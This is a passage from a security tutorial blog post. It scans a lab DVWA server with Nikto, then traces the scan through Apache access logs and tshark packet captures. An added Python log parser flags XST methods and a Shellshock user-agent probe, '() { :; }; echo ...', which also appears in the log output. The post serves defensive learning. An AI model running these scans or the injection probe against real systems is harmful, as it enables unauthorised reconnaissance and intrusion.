/><a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods/PUT" target="_blank">https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods/PUT</a><br /><a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods/OPTIONS" target="_blank">https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods/OPTIONS</a><br /><a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods/TRACE" target="_blank">https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods/TRACE</a></p><p><b>Beginning Nikto - Scanning for interesting files seen in the logs</b> (Nik Alleyne, 2023-12-12)</p><p>The idea of this series is to use Nikto to learn about common vulnerabilities in web services. Once those vulnerabilities are identified, we will then attempt to exploit them where possible. As I work in a SOC, we have to be prepared to detect. As a result, we will analyze logs, packets (Tshark), IDS (Suricata) and Zeek data. This is all in the spirit of <a href="https://www.amazon.com/Learning-Practicing-Leveraging-Practical-Detection/dp/1731254458" target="_blank">hack and detect</a>.</p><p>We will attempt to learn some of the different evasion techniques used by Nikto throughout this series, as we go through the 10 different "<i>Tuning</i>" strategies.</p><p>The web server I will be targeting is <a href="https://github.com/digininja/DVWA" target="_blank">Damn Vulnerable Web App (DVWA)</a>.</p><p>In this first post within this series, we will leverage Nikto to find "<i>interesting files</i>" on the web server. </p><p><br /><b><span style="font-size: medium;">Hack "Interesting File / Seen in logs"</span></b></p><p>Let's assume we did reconnaissance on the host and identified that port 80 is open and offering a web service. 
With that knowledge, let's see what we can learn about interesting files on the system.</p><p>First, run Nikto without any evasion:</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff]</span>
<span style="color: white;">└─$ nikto -host http://10.0.0.106 -ipv4 -Display 1 --ask no -Format json \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">-o /tmp/nikto.json -nossl -no404 -Tuning 1</span>
<span style="color: white;">- Nikto v2.5.0</span>
<span style="color: white;">---------------------------------------------------------------------------</span>
<span style="color: white;">+ Target IP: 10.0.0.106</span>
<span style="color: white;">+ Target Hostname: 10.0.0.106</span>
<span style="color: white;">+ Target Port: 80</span>
<span style="color: white;">+ Start Time: 2023-05-11 16:08:10 (GMT-4)</span>
<span style="color: white;">---------------------------------------------------------------------------</span>
<span style="color: white;">+ Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28</span>
<span style="color: white;">...</span>
<span style="color: white;">+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing</span>
<span style="color: white;">+ /img/: Directory indexing found.</span>
<span style="color: white;">+ /img/: This might be interesting.</span>
<span style="color: white;">...</span>
<span style="color: white;">+ 2596 requests: 0 error(s) and 8 item(s) reported on remote host</span>
<span style="color: white;">+ End Time: 2023-05-11 16:08:16 (GMT-4) (6 seconds)</span>
<span style="color: white;">---------------------------------------------------------------------------</span>
<span style="color: white;">+ 1 host(s) tested</span>
</pre></div>
</div><div><br /></div><div>Above, the host at <i>10.0.0.106</i> was targeted via IPv4. We also wrote the output to a JSON file and disabled SSL. At the same time, 404 messages were not shown and, most importantly, option "<i>Tuning 1</i>" was used.</div><div><div><br /></div><div>Based on the response above, it seems only one "<i>interesting</i>" file, in this case a directory (<i>/img/</i>), was found.</div></div><div><br /></div><div><div><b><span style="font-size: medium;">Detect - Log Analysis</span></b></div></div><div><br /></div><div><div>How many times was the "threat actor's IP" seen in the logs?</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_1]</span>
<span style="color: white;">└─$ cat access.log | cut --fields 1 --delimiter=' ' | uniq --count </span>
<span style="color: white;"> 2596 10.0.0.107</span>
</pre></div>
</div><div><br /></div><div><div>The above shows 2596 occurrences of this IP in the Apache <i>access.log</i> file.</div><div><br /></div><div>Interestingly, since we know Nikto is the tool used to target our environment, is there any evidence of Nikto in our logs? Let's find out.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_1]</span>
<span style="color: white;">└─$ cat access.log | grep nikto </span>
<span style="color: white;">10.0.0.107 - - [11/May/2023:16:07:39 -0400] "PUT /</span><span style="color: #fcff01;">nikto</span><span style="color: white;">-test-Bqe4RxLj.html HTTP/1.1" 405 321 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"</span>
</pre></div>
</div><div><br /></div><div><div>We see one above, "<i>PUT /nikto-test-Bqe4RxLj.html HTTP/1.1</i>". At this point, this is the only evidence of Nikto being used. Not sure if you noticed it, but the user agent says nothing about Nikto by default.</div><div><br /></div><div>Talking about user agents, I believe this is a great source of threat intelligence (even though it can be easily spoofed). Let's see what is in our logs.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_1]</span>
<span style="color: white;">└─$ cat access.log | grep "10.0.0.107" | cut --field 6 --delimiter='"' | \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">sort | uniq --count | sort --numeric-sort --reverse </span>
<span style="color: white;"> 2408 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36</span>
<span style="color: white;"> 123 () { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;</span>
</pre></div>
</div><div><br /></div><div>We saw earlier that there was a <i>PUT</i> method. Let's take a closer look at what other methods are there and how access was being attempted.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_1]</span>
<span style="color: white;">└─$ cat access.log | grep "10.0.0.107" | cut --field 2 --delimiter=']' | \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">cut --fields 1 --delimiter='/' | sort | uniq --count | sort --numeric-sort --reverse </span>
<span style="color: white;"> 2586 "GET </span>
<span style="color: white;"> 2 "TRACK </span>
<span style="color: white;"> 1 "UVMGSHXG </span>
<span style="color: white;"> 1 "TRACE </span>
<span style="color: white;"> 1 "PUT </span>
<span style="color: white;"> 1 "PROPFIND </span>
<span style="color: white;"> 1 "OPTIONS * HTTP</span>
<span style="color: white;"> 1 "OPTIONS </span>
<span style="color: white;"> 1 "GET . HTTP</span>
<span style="color: white;"> 1 "DEBUG </span>
</pre></div>
</div><div><br /></div><div><div>Not much surprise that the <i>GET</i> method is the most seen. Interestingly, looking at RFC 2616 "Hypertext Transfer Protocol -- HTTP/1.1", I see <i>GET, PUT, TRACE</i> and <i>OPTIONS</i>. I don't see anything for <i>TRACK, UVMGSHXG, PROPFIND</i> or <i>DEBUG</i>. Where did these come from?!</div><div><br /></div><div><i>PROPFIND</i> is part of <i>RFC4918</i> "HTTP Extensions for Web Distributed Authoring and Versioning (WebDAV)" and can be used to retrieve directory information. <i>TRACK</i> is Microsoft's implementation similar to <i>TRACE</i>.</div><div><br /></div><div>Rather than going through all these methods, let's instead look at the status codes returned by the server for possible clues on how to further our investigation.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_1]</span>
<span style="color: white;">└─$ cat access.log | grep "10.0.0.107" | cut --field 2 --delimiter=']'| \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">cut --fields=3 --delimiter='"' | cut --fields=2 --delimiter=' ' | sort | \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">uniq --count | sort --numeric-sort --reverse </span>
<span style="color: white;"> 2496 404</span>
<span style="color: white;"> 51 </span>
<span style="color: white;"> 21 302</span>
<span style="color: white;"> 13 ./.\\\</span>
<span style="color: white;"> 5 400</span>
<span style="color: white;"> 4 403</span>
<span style="color: white;"> 4 200</span>
<span style="color: white;"> 1 417</span>
<span style="color: white;"> 1 405</span>
</pre></div>
</div><div><br /></div><div><div>Nice to see the majority of requests returned <i>404</i> - Not Found. There is a lot to poke through, but I will not waste time on any of the 400 series errors as these are all "<i>Client Error</i>" responses.</div><div><br /></div><div>Let's instead focus on status code <i>200 "Successful"</i>:</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_1]</span>
<span style="color: white;">└─$ cat access.log | grep "10.0.0.107" | grep --perl-regexp '\s+200?\s+' | \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">awk --field-separator='Mozilla' '{ print $1 }'</span>
<span style="color: white;">10.0.0.107 - - [11/May/2023:16:07:40 -0400] "GET /favicon.ico HTTP/1.1" 200 30894 "-" "</span>
<span style="color: white;">10.0.0.107 - - [11/May/2023:16:07:41 -0400] "OPTIONS * HTTP/1.1" 200 - "-" "</span>
<span style="color: white;">10.0.0.107 - - [11/May/2023:16:07:41 -0400] "TRACE / HTTP/1.0" 200 192 "-" "</span>
<span style="color: white;">10.0.0.107 - - [11/May/2023:16:07:42 -0400] "GET /img/ HTTP/1.1" 200 1214 "-" "</span>
</pre></div>
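<p>Each of the <i>cut | sort | uniq --count</i> pipelines in this log-analysis section answers one question about the same <i>access.log</i>: requests per client IP, per user agent, per method and per status code, then the 200 responses. As an added example, not code from the original post, here is the same work done in one pass in Python, which also flags what is worth a second look in this scenario: methods outside RFC 7231, a 200 to <i>TRACE</i> or <i>TRACK</i> (the XST finding Nikto reports), a Shellshock-style user agent, and the <i>nikto-test</i> marker file. The log lines are constructed to mirror the output shown above; the second client IP, the <i>/cgi-bin</i> and <i>/admin/</i> paths, the response sizes and the shared timestamp are made up.</p>

```python
"""Summarise an Apache combined-format access.log in one pass.

Added example, not code from the original post. The log lines in
SAMPLE_LOG are constructed to mirror the scan traffic the post shows;
the second client IP, some paths, sizes and the timestamp are made up."""
import re
from collections import Counter

# Apache "combined" format:
# %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Methods from RFC 7231 and RFC 5789; anything else deserves a look.
STANDARD_METHODS = {"GET", "HEAD", "POST", "PUT", "DELETE", "CONNECT",
                    "OPTIONS", "TRACE", "PATCH"}
# A 200 to TRACE or TRACK is the cross-site tracing (XST) finding Nikto reports.
XST_METHODS = {"TRACE", "TRACK"}
# Shellshock-style user agent: an empty function body followed by commands.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{\s*:;\s*\}\s*;")


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.rstrip("\n"))
    if not m:
        return None
    rec = m.groupdict()
    parts = rec["request"].split(" ")
    rec["method"] = parts[0] or "-"
    rec["path"] = parts[1] if len(parts) > 1 else "-"
    rec["status"] = int(rec["status"])
    return rec


def summarise(lines):
    """Build the views the cut/sort/uniq pipelines above produce, plus review flags."""
    parsed = [parse_line(l) for l in lines]
    recs = [r for r in parsed if r is not None]
    flags = []
    for r in recs:
        if r["method"] not in STANDARD_METHODS:
            flags.append(("nonstandard-method", r["method"], r["path"]))
        if r["method"] in XST_METHODS and r["status"] == 200:
            flags.append(("xst-method-enabled", r["method"], r["path"]))
        if SHELLSHOCK_RE.search(r["ua"]):
            flags.append(("shellshock-ua", r["method"], r["path"]))
        if "nikto" in r["path"].lower():
            flags.append(("nikto-marker", r["method"], r["path"]))
    return {
        "by_ip": Counter(r["ip"] for r in recs),
        "by_method": Counter(r["method"] for r in recs),
        "by_status": Counter(r["status"] for r in recs),
        "by_ua": Counter(r["ua"] for r in recs),
        "successful": [(r["method"], r["path"]) for r in recs if r["status"] == 200],
        "unparsed": parsed.count(None),
        "flags": flags,
    }


# Constructed sample: Nikto's default user agent from the post, the Shellshock
# probe UA from the post, and one unrelated (made-up) client.
UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
      "(KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36")
SHOCK = "() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"
TS = "[11/May/2023:16:07:41 -0400]"
SAMPLE_LOG = [
    f'10.0.0.107 - - {TS} "PUT /nikto-test-Bqe4RxLj.html HTTP/1.1" 405 321 "-" "{UA}"',
    f'10.0.0.107 - - {TS} "GET /favicon.ico HTTP/1.1" 200 30894 "-" "{UA}"',
    f'10.0.0.107 - - {TS} "OPTIONS * HTTP/1.1" 200 - "-" "{UA}"',
    f'10.0.0.107 - - {TS} "TRACE / HTTP/1.0" 200 192 "-" "{UA}"',
    f'10.0.0.107 - - {TS} "TRACK / HTTP/1.1" 405 321 "-" "{UA}"',
    f'10.0.0.107 - - {TS} "UVMGSHXG / HTTP/1.1" 400 226 "-" "{UA}"',
    f'10.0.0.107 - - {TS} "GET /cgi-bin/test.cgi HTTP/1.1" 404 196 "-" "{SHOCK}"',
    f'10.0.0.107 - - {TS} "GET /img/ HTTP/1.1" 200 1214 "-" "{UA}"',
    f'10.0.0.107 - - {TS} "GET /admin/ HTTP/1.1" 404 196 "-" "{UA}"',
    f'10.0.0.50 - - {TS} "GET / HTTP/1.1" 200 4096 "-" "curl/8.0.1"',
]

if __name__ == "__main__":
    s = summarise(SAMPLE_LOG)
    for key in ("by_ip", "by_method", "by_status"):
        print(key, s[key].most_common())
    print("2xx:", s["successful"])
    for flag in s["flags"]:
        print("flag:", *flag)
```

<p>Point <i>summarise()</i> at <i>open("access.log")</i> instead of <i>SAMPLE_LOG</i> and the counts line up with the shell output; the <i>unparsed</i> counter is the check the shell pipelines lack, since a non-zero value means the log format differs from "combined" and every other number is suspect.</p>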
</div><div><br /></div><div><div>The last line shows "<i>GET /img/ HTTP/1.1" 200</i>, which suggests the finding "<i>+ /img/: This might be interesting.</i>" returned in Nikto's output above is most likely associated with this request.</div><div><br /></div><div>At this point, there is no need for additional log analysis. There is nothing "threatening" in the logs.</div></div><div><br /></div><div><br /></div><div><b><span style="font-size: medium;">Detect - Packet Analysis</span> </b></div><div><br /></div><div><div>Set up for packet analysis by capturing packets on ports <i>80 or 443</i>:</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff]</span>
<span style="color: white;">└─$ tshark -n -w tuning_1.pcap -f 'tcp port(80 or 443)' --interface eth0</span>
<span style="color: white;">Capturing on 'eth0'</span>
<span style="color: white;"> ** (tshark:395047) 16:07:08.756192 [Main MESSAGE] -- Capture started.</span>
<span style="color: white;"> ** (tshark:395047) 16:07:08.756254 [Main MESSAGE] -- File: "tuning_1.pcap"</span>
<span style="color: white;">5808 ^C</span>
</pre></div>
</div><div><br /></div><div><div>With the capture in place, let's do some analysis.</div><div><br /></div><div>What are the protocols seen in the PCAP?</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_1]</span>
<span style="color: white;">└─$ tshark -n -r tuning_1.pcap -q -z io,phs</span>
<span style="color: white;">===================================================================</span>
<span style="color: white;">Protocol Hierarchy Statistics</span>
<span style="color: white;">Filter: </span>
<span style="color: white;">eth frames:5808 bytes:2283533</span>
<span style="color: white;"> ip frames:5808 bytes:2283533</span>
<span style="color: white;"> tcp frames:5808 bytes:2283533</span>
<span style="color: white;"> http frames:5189 bytes:2214997</span>
<span style="color: white;"> data-text-lines frames:2574 bytes:1523618</span>
<span style="color: white;"> urlencoded-form frames:1 bytes:358</span>
<span style="color: white;"> media frames:1 bytes:603</span>
<span style="color: white;"> tcp.segments frames:1 bytes:603</span>
<span style="color: white;"> tcp.segments frames:1 bytes:60</span>
<span style="color: white;"> http frames:1 bytes:60</span>
<span style="color: white;"> message-http frames:1 bytes:60</span>
<span style="color: white;">===================================================================</span>
</pre></div>
</div><div><br /></div><div><div>Looking at the IP conversations, we see communication between two hosts, for a total of 5808 frames or 2,283 kB.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_1]</span>
<span style="color: white;">└─$ tshark -n -r tuning_1.pcap -q -z conv,ip</span>
<span style="color: white;">================================================================================</span>
<span style="color: white;">IPv4 Conversations</span>
<span style="color: white;">Filter:<No Filter></span>
<span style="color: white;"> | <- | | -> | | Total | Relative | Duration |</span>
<span style="color: white;"> | Frames Bytes | | Frames Bytes | | Frames Bytes | Start | |</span>
<span style="color: white;">10.0.0.107 <-> 10.0.0.106 2869 1,578 kB 2939 704 kB 5808 2,283 kB 0.000000000 6.6385</span>
<span style="color: white;">================================================================================</span>
</pre></div>
</div><div><br /></div><div>How did the two hosts communicate? Let's figure that out by looking at the TCP conversations. I chose TCP because there is no UDP data in the protocol hierarchy shown above. Looking at the conversations with a focus on the duration, frames and bytes suggests this is more likely reconnaissance activity, as the byte and frame counts are similar across conversations.</div><div><br /></div><div>Some may even see this as possible beaconing activity because of the consistency of frames and bytes to this particular destination (10.0.0.106) on this particular port (80). We know it is not, because we are doing this scenario ;-). </div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_1]</span>
<span style="color: white;">└─$ tshark -n -r tuning_1.pcap -q -z conv,tcp | more</span>
<span style="color: white;">================================================================================</span>
<span style="color: white;">TCP Conversations</span>
<span style="color: white;">Filter:<No Filter></span>
<span style="color: white;"> | <- | | -> | | Total | Relative | Duration |</span>
<span style="color: white;"> | Frames Bytes | | Frames Bytes | | Frames Bytes | Start | |</span>
<span style="color: white;">10.0.0.107:37652 <-> 10.0.0.106:80 104 59 kB 106 27 kB 210 86 kB 1.456681410 0.2623</span>
<span style="color: white;">10.0.0.107:38216 <-> 10.0.0.106:80 104 59 kB 106 26 kB 210 86 kB 4.558459670 0.4762</span>
<span style="color: white;">10.0.0.107:37538 <-> 10.0.0.106:80 104 59 kB 105 25 kB 209 85 kB 0.000000000 0.2090</span>
<span style="color: white;">10.0.0.107:37550 <-> 10.0.0.106:80 104 59 kB 105 25 kB 209 85 kB 0.209464854 0.2453</span>
<span style="color: white;">10.0.0.107:37554 <-> 10.0.0.106:80 104 59 kB 105 25 kB 209 85 kB 0.454103547 0.163</span>
<span style="color: white;">....</span>
</pre></div>
</div><div><br /></div><div><div>Overall, how many TCP conversations are there?</div></div><div><br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_1]</span>
<span style="color: white;">└─$ tshark -n -r tuning_1.pcap -q -z conv,tcp | sed '1,5d;$d;/^$/d' | \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">wc --lines </span>
<span style="color: white;">84</span>
</pre></div>
</div><div><br /></div><div><div>How many unique streams do I have in this PCAP? Well, you just got the answer above. This is just another way to confirm it.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_1]</span>
<span style="color: white;">└─$ tshark -n -r tuning_1.pcap -T fields -e tcp.stream | sort | \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">uniq --count | sort --numeric-sort --reverse | wc --lines</span>
<span style="color: white;">84</span>
</pre></div>
</div><div><br /></div><div><div>With 84 streams, where do we start? Taking a look at the packets' TCP payload lengths, while also returning the matching stream number.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_1]</span>
<span style="color: white;">└─$ tshark -n -r tuning_1.pcap -T fields -e tcp.len -e tcp.stream | \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">sort --numeric-sort --key=1 --reverse | more </span>
<span style="color: white;">1460 4</span>
<span style="color: white;">1460 4</span>
<span style="color: white;">1460 4</span>
<span style="color: white;">1460 4</span>
<span style="color: white;">1460 4</span>
<span style="color: white;">1460 4</span>
<span style="color: white;">1460 4</span>
<span style="color: white;">1460 4</span>
<span style="color: white;">1460 4</span>
<span style="color: white;">1460 4</span>
<span style="color: white;">1460 4</span>
<span style="color: white;">1460 4</span>
<span style="color: white;">1460 4</span>
<span style="color: white;">1460 4</span>
<span style="color: white;">1460 4</span>
<span style="color: white;">1460 4</span>
<span style="color: white;">1460 4</span>
<span style="color: white;">1460 4</span>
<span style="color: white;">1460 4</span>
<span style="color: white;">1460 4</span>
<span style="color: white;">1460 4</span>
<span style="color: white;">1443 13</span>
<span style="color: white;">742 6</span>
<span style="color: white;">660 81</span>
<span style="color: white;">607 0</span>
<span style="color: white;">...</span>
</pre></div>
</div><div><br /></div><div>Stream <i>4</i> looks to be the biggest, with payloads <i>1460</i> bytes long. Peeking into stream <i>4</i> returned a number of entries with <i>404</i> errors.</div><div><div><br /></div><div>There was, however, one response with <i>200 OK</i> and a <i>302 Found</i>.</div></div><div><br /></div><div><span style="color: white;"><!--HTML generated using hilite.me--></span><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"><span>┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_1]</span>
<span>└─$ tshark -n -r tuning_1.pcap -q -z follow,tcp,ascii,4 | grep --perl-regexp '^HTTP/1.1' | sort | uniq --count | sort --numeric-sort --reverse</span>
<span> 80 </span><span style="font-weight: bold;">HTTP</span><span>/</span><span style="font-weight: bold;">1.1</span> <span style="font-weight: bold;">404</span> <span>Not Found</span>
<span>4 HTTP/1.1 302 Found</span>
<span>1 HTTP/1.1 400 Bad Request</span>
<span>1 HTTP/1.1 200 OK</span></span>
</pre></div>
</div><div><br /></div><div>Finding records where the HTTP response code is <i>200.</i></div><div><br /></div><div><span style="color: white;"><!--HTML generated using hilite.me--></span><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"><span>┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_1]</span>
<span>└─$ tshark -n -r tuning_1.pcap -Y 'http.response.code == 200'</span>
<span> 967 0.944983715 10.0.0.106 → 10.0.0.107 HTTP 603 </span><span style="font-weight: bold;">HTTP</span><span>/</span><span style="font-weight: bold;">1.1</span> <span style="font-weight: bold;">200</span> <span>OK (image/x-icon)</span>
<span>1363 1.441673139 10.0.0.106 → 10.0.0.107 HTTP 241 HTTP/1.1 200 OK </span>
<span>1381 1.450651187 10.0.0.106 → 10.0.0.107 HTTP 60 HTTP/1.1 200 OK (message/http)</span>
<span>1951 2.310611664 10.0.0.106 → 10.0.0.107 HTTP 1497 HTTP/1.1 200 OK (text/html)</span></span>
</pre></div>
</div><div><br /></div><div><div>Looking a bit deeper</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_1]</span>
<span style="color: white;">└─$ tshark -n -r tuning_1.pcap -Y 'http.response.code == 200' -T fields -e ip.src -e ip.dst -e tcp.srcport -e tcp.stream -E header=y</span>
<span style="color: white;">ip.src ip.dst tcp.srcport tcp.stream</span>
<span style="color: white;">10.0.0.106 10.0.0.107 80 4</span>
<span style="color: white;">10.0.0.106 10.0.0.107 80 8</span>
<span style="color: white;">10.0.0.106 10.0.0.107 80 9</span>
<span style="color: white;">10.0.0.106 10.0.0.107 80 13</span>
</pre></div>
</div><div><br /></div><div><div>Following stream <i>8</i> to see what's going on inside. We see this was an <i>OPTIONS</i> request.</div></div><div><br /></div><div><span style="color: white;"><!--HTML generated using hilite.me--></span><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"><span>┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_1]</span>
<span>└─$ tshark -n -r tuning_1.pcap -q -z follow,tcp,ascii,8 | grep --perl-regexp '200 OK' --after-context=5 --before-context=7 </span>
<span style="font-weight: bold;">OPTIONS</span> <span>*</span> <span style="font-weight: bold;">HTTP</span><span>/</span><span style="font-weight: bold;">1.1</span>
<span style="font-weight: bold;">User-Agent</span><span>:</span> <span>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36</span>
<span style="font-weight: bold;">Connection</span><span>:</span> <span>Keep-Alive</span>
<span style="font-weight: bold;">Host</span><span>:</span> <span>10.0.0.106</span>
187
HTTP/1.1 200 OK
Date: Thu, 11 May 2023 20:07:41 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
Content-Length: 0
Keep-Alive: timeout=5, max=77
Connection: Keep-Alive
</span></pre></div>
</div><div><br /></div><div><div>Above, the client just seems to be looking for the HTTP communication options available on the server.</div><div><br /></div><div>Let's see what stream <i>13</i> has.</div></div><div><br /></div><div><span style="color: white;"><!--HTML generated using hilite.me--></span><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"><span>┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_1]</span>
<span>└─$ tshark -n -r tuning_1.pcap -q -z follow,tcp,ascii,13 | \</span></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"><span>grep --perl-regexp '200 OK' --after-context=5 --before-context=7 </span>
<span style="font-weight: bold;">GET</span> <span>/img/</span> <span style="font-weight: bold;">HTTP</span><span>/</span><span style="font-weight: bold;">1.1</span>
